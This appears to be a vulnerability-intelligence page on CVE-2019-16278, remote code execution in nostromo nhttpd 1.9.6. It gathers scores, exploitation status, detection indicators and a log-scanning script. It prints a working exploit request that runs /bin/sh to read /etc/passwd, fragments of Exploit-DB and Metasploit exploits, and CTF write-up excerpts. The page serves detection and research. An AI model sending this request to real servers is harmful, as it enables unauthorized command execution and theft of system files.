CVE-2019-16278
Published: 2019-10-14
CVE-2019-16278: Directory Traversal in the function http_verify in nostromo nhttpd through 1.9.6 allows an attacker to achieve remote code execution via a crafted HTTP request.
Priority: P194 · critical · 9.8 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
KEV · ITW · EXPLOIT · Initial access
CISA Known Exploited Vulnerability, due 2024-11-28
Exploited in the wild
EPSS: 99.06% (99.9th percentile)
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| nazgul | nostromo_nhttpd | < 1.9.7 | 1.9.7 |
Detection & IOCs
Command:
```
POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.1
Host: {{Hostname}}
echo
echo
cat /etc/passwd 2>&1
```
- Detect exploitation attempts by inspecting HTTP POST requests containing the URL-encoded carriage-return traversal sequence `/.%0d./.%0d./.%0d./.%0d./bin/sh` in the request URI targeting nostromo nhttpd.
- Alert on HTTP responses from servers advertising `nostromo` in the Server header with a version of 1.9.6 or earlier, as these are confirmed vulnerable.
- The exploit payload uses `%0d` (URL-encoded carriage return `\r`) as the directory traversal separator instead of the standard `../`, allowing bypass of path normalization checks in `http_verify`.
- Monitor for POST requests to paths matching the pattern `/.%0d./` repeated multiple times, which is the canonical traversal pattern for this CVE.
- On affected hosts, monitor access to `/var/nostromo/conf/nhttpd.conf` and `.htpasswd` files, which attackers enumerate post-exploitation to escalate privileges.
- The vulnerability only affects non-chrooted nhttpd deployments; chrooted configurations limit the impact of the directory traversal.
- The HOMEDIRS configuration in nhttpd.conf may expose user home subdirectories (e.g., `public_www`) even when the parent home directory is not world-readable, widening the attack surface.
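A log-side check for the first four indicators above, as an added example (not code from any of the quoted sources): it flags request targets that carry the `/.%0d./` segment and Server banners below the fixed version 1.9.7. The combined-log layout, the function names and the sample lines are assumptions constructed for illustration.

```python
import re

# Traversal segment for this CVE, matched on the raw (undecoded) request target.
# Case-insensitive so "%0D" is caught as well as "%0d".
TRAVERSAL_SEG = re.compile(r"/\.%0d\.(?=/)", re.IGNORECASE)
# Assumed log layout: combined-log style, request line inside double quotes.
REQUEST_LINE = re.compile(
    r'^(?P<src>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
SERVER_BANNER = re.compile(r"nostromo[ /](?P<ver>\d+(?:\.\d+)*)", re.IGNORECASE)
FIXED_VERSION = (1, 9, 7)  # "Fixed in" value from the Affected table

# Constructed sample lines (documentation address range), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /index.html HTTP/1.1" 200 512',
    '192.0.2.44 - - [01/Jan/2024:10:00:05 +0000] '
    '"POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.1" 200 1337',
    '192.0.2.45 - - [01/Jan/2024:10:00:09 +0000] "POST /.%0D./.%0D./bin/sh HTTP/1.0" 200 90',
    '192.0.2.77 - - [01/Jan/2024:10:01:00 +0000] "GET /search?q=a%0db HTTP/1.1" 200 64',
]

def traversal_hit(log_line):
    """Return (src, method, segment_count) if the target carries the pattern, else None."""
    m = REQUEST_LINE.search(log_line)
    if not m:
        return None
    count = len(TRAVERSAL_SEG.findall(m.group("target")))
    return (m.group("src"), m.group("method"), count) if count else None

def scan(lines):
    """Collect every hit; repeated segments in a POST match the pattern described above."""
    return [hit for hit in map(traversal_hit, lines) if hit]

def banner_is_affected(server_header):
    """True for a nostromo Server banner whose version is below FIXED_VERSION."""
    m = SERVER_BANNER.search(server_header)
    if not m:
        return False
    return tuple(int(p) for p in m.group("ver").split(".")) < FIXED_VERSION

if __name__ == "__main__":
    for src, method, count in scan(SAMPLE_LOG):
        print(f"ALERT CVE-2019-16278 pattern: src={src} method={method} segments={count}")
    print("nostromo 1.9.6 affected:", banner_is_affected("nostromo 1.9.6"))
```

The match runs on the undecoded target, so it has to see the request before any proxy or logger normalises `%0d`.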
CVSS provenance
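| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |
| vulncheck | | 9.8 | CRITICAL | |
| cisa | | 9.8 | CRITICAL | |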
GHSA
GHSA-495x-r3cr-6rgx: Directory Traversal in the function http_verify in nostromo nhttpd through 1
ghsa_unreviewed·2022-05-24
CVE-2019-16278 [CRITICAL] CWE-22 GHSA-495x-r3cr-6rgx: Directory Traversal in the function http_verify in nostromo nhttpd through 1
Directory Traversal in the function http_verify in nostromo nhttpd through 1.9.6 allows an attacker to achieve remote code execution via a crafted HTTP request.
VulnCheck
Nostromo nhttpd Directory Traversal Vulnerability
vulncheck·2019·CVSS 9.8
CVE-2019-16278 [CRITICAL] CWE-22 Nostromo nhttpd Directory Traversal Vulnerability
Nostromo nhttpd contains a directory traversal vulnerability in the http_verify() function in a non-chrooted nhttpd server allowing for remote code execution.
Affected: Nostromo nhttpd
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://blog.radware.com/security/botnets/2020/05/whos-viktor-tracking-down-the-xtc-polaris-botnets/; https://www.justice.gov/opa/pr/seven-international-cyber-defendants-including-apt41-actors-charged-connection-computer; https://www.bleepingcomputer.com/news/security/us-charges-chinese-winnti-hackers-for-attacking-100-plus-companies/; https://cisa.gov/news-events/cybersecurity-advisories/aa20-275a; https://
CISA
Nostromo nhttpd Directory Traversal Vulnerability
cisa·2024-11-07·CVSS 9.8
CVE-2019-16278 [CRITICAL] CWE-22 Nostromo nhttpd Directory Traversal Vulnerability
Vulnerability: Nostromo nhttpd Directory Traversal Vulnerability
Affected: Nostromo nhttpd
Nostromo nhttpd contains a directory traversal vulnerability in the http_verify() function in a non-chrooted nhttpd server allowing for remote code execution.
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Notes: https://www.nazgul.ch/dev/nostromo_cl.txt ; https://nvd.nist.gov/vuln/detail/CVE-2019-16278
Remediation Due Date: 2024-11-28
No detection rules found.
Exploit-DB
nostromo 1.9.6 - Remote Code Execution
exploitdb·2020-01-01·CVSS 9.8
CVE-2019-16278 [CRITICAL] nostromo 1.9.6 - Remote Code Execution
---
# Exploit Title: nostromo 1.9.6 - Remote Code Execution
# Date: 2019-12-31
# Exploit Author: Kr0ff
# Vendor Homepage:
# Software Link: http://www.nazgul.ch/dev/nostromo-1.9.6.tar.gz
# Version: 1.9.6
# Tested on: Debian
# CVE : CVE-2019-16278
cve2019_16278.py
#!/usr/bin/env python
import sys
import socket
art = """
_____-2019-16278
_____ _______ ______ _____\ \
_____\ \_\ | | | / / | |
/ /| || / / /|/ / /___/|
/ / /____/||\ \ \ |/| |__ |___|/
| | |____|/ \ \ \ | | | \
| | _____ \| \| | | __/ __
|\ \|\ \ |\ /| |\ \ / \
| \_____\| | | \_______/ | | \____\/ |
| | /____/| \ | | / | | |____/|
\|_____| || \|_____|/ \|____| | |
|____|/ |___|/
"""
help_menu = '\r\nUsage: cve2019-16278.py '
def connect(soc):
response = ""
try:
while True:
connect
Exploit-DB
Nostromo - Directory Traversal Remote Command Execution (Metasploit)
exploitdb·2019-11-01
CVE-2019-16278 Nostromo - Directory Traversal Remote Command Execution (Metasploit)
---
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule 'Nostromo Directory Traversal Remote Command Execution',
'Description' => %q{
This module exploits a remote command execution vulnerability in
Nostromo
[
'Quentin Kaiser ', # metasploit module
'sp0re', # original public exploit
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2019-16278'],
[ 'URL', 'https://www.sudokaikan.com/2019/10/cve-2019-16278-unauthenticated-remote.html'],
],
'Platform' => ['linux', 'unix'], # OpenBSD, FreeBSD, NetBSD, and Linux
'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64, ARCH_MIPSBE, ARCH_MIPSLE, ARCH_ARMLE, ARCH_AARCH64],
'Targ
Metasploit
Nostromo Directory Traversal Remote Command Execution
metasploit
This module exploits a remote command execution vulnerability in Nostromo <= 1.9.6. This issue is caused by a directory traversal in the function `http_verify` in nostromo nhttpd allowing an attacker to achieve remote code execution via a crafted HTTP request.
Nuclei
nostromo 1.9.6 - Remote Code Execution
nuclei·CVSS 9.8
CVE-2019-16278 [CRITICAL] nostromo 1.9.6 - Remote Code Execution
nostromo nhttpd through 1.9.6 allows an attacker to achieve remote code execution via directory traversal in the function http_verify.
Template:
```
id: CVE-2019-16278

info:
  name: nostromo 1.9.6 - Remote Code Execution
  author: pikpikcu
  severity: critical
  description: nostromo nhttpd through 1.9.6 allows an attacker to achieve remote code execution via directory traversal in the function http_verify.
  impact: |
    Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the target system.
  remediation: |
    Upgrade to a patched version of nostromo web server (1.9.7 or later) or apply the vendor-supplied patch.
  reference:
    - https://packetstormsecurity.com/files/155802/nostromo-1.9.6-Remote-Code-Execution.html
    - https://www.e
```
CTF
medium / README
ctf_writeups·CVSS 9.1
[CRITICAL] medium / README
---
layout: default
title: Medium Machines
parent: Machines
nav_order: 2
description: "112+ Medium HTB machine writeups with walkthroughs"
permalink: /machines/medium/
---
# HackTheBox - Medium Machines
> Comprehensive index of retired HTB Medium-difficulty machines with key techniques and attack path summaries.
**Total: 100+ machines** | Sorted roughly by retirement date (newest first)
---
## Machine Index
| # | Machine | OS | Key Techniques | Attack Path Summary | Writeup |
|---|---------|-----|----------------|---------------------|---------|
| 1 | Signed | Linux | Code Signing Bypass, Certificate Abuse | Forge code signature to deploy malicious update, escalate via trusted binary execution | [0xdf](https://0xdf.gitlab.io/2026/02/07/htb-signed.html) |
| 2 | Voleur | Linux | Data E
CTF
Traverxec / README
ctf_writeups
Traverxec / README
# Traverxec
> Write-up author: jon-brandy
## Lessons Learned:
- Exploiting nostromo 1.9.6.
## STEPS:
> PORT SCANNING
```
┌──(brandy㉿bread-yolk)-[~]
└─$ nmap -p- -sV -sC 10.10.10.165 --min-rate 1000 -Pn
Starting Nmap 7.93 ( https://nmap.org ) at 2024-01-22 01:12 PST
Nmap scan report for 10.10.10.165
Host is up (0.25s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
| 2048 aa99a81668cd41ccf96c8401c759095c (RSA)
| 256 93dd1a23eed71f086b58470973a388cc (ECDSA)
|_ 256 9dd6621e7afb8f5692e637f110db9bce (ED25519)
80/tcp open http nostromo 1.9.6
|_http-server-header: nostromo 1.9.6
|_http-title: TRAVERXEC
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection pe
```
CTF
easy / README
ctf_writeups·CVSS 6.0
[MEDIUM] easy / README
---
layout: default
title: Easy Machines
parent: Machines
nav_order: 1
description: "120+ Easy HTB machine writeups with walkthroughs"
permalink: /machines/easy/
---
# HackTheBox Easy Machines - Comprehensive Reference
> Complete catalog of retired HTB Easy machines with OS, key vulnerability, attack path summary, and quality writeup links.
**Total: 100+ Easy Machines** | Updated: April 2026
---
## Quick Navigation
- [Classic / Legacy Machines (2017-2019)](#classic--legacy-machines-2017-2019)
- [2019-2020 Machines](#2019-2020-machines)
- [2021 Machines](#2021-machines)
- [2022 Machines](#2022-machines)
- [2023 Machines](#2023-machines)
- [2024 Machines (Season 4 & 5)](#2024-machines-season-4--5)
- [2025-2026 Machines (Season 6+)](#2025-2026-machines-season-6)
---
## Classic / Legac
- http://packetstormsecurity.com/files/155045/Nostromo-1.9.6-Directory-Traversal-Remote-Command-Execution.html
- http://packetstormsecurity.com/files/155802/nostromo-1.9.6-Remote-Code-Execution.html
- http://www.nazgul.ch/dev/nostromo_cl.txt
- https://git.sp0re.sh/sp0re/Nhttpd-exploits
- https://sp0re.sh
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2019-16278
Published: 2019-10-14
Added to CISA KEV: 2024-11-07
Exploited in the wild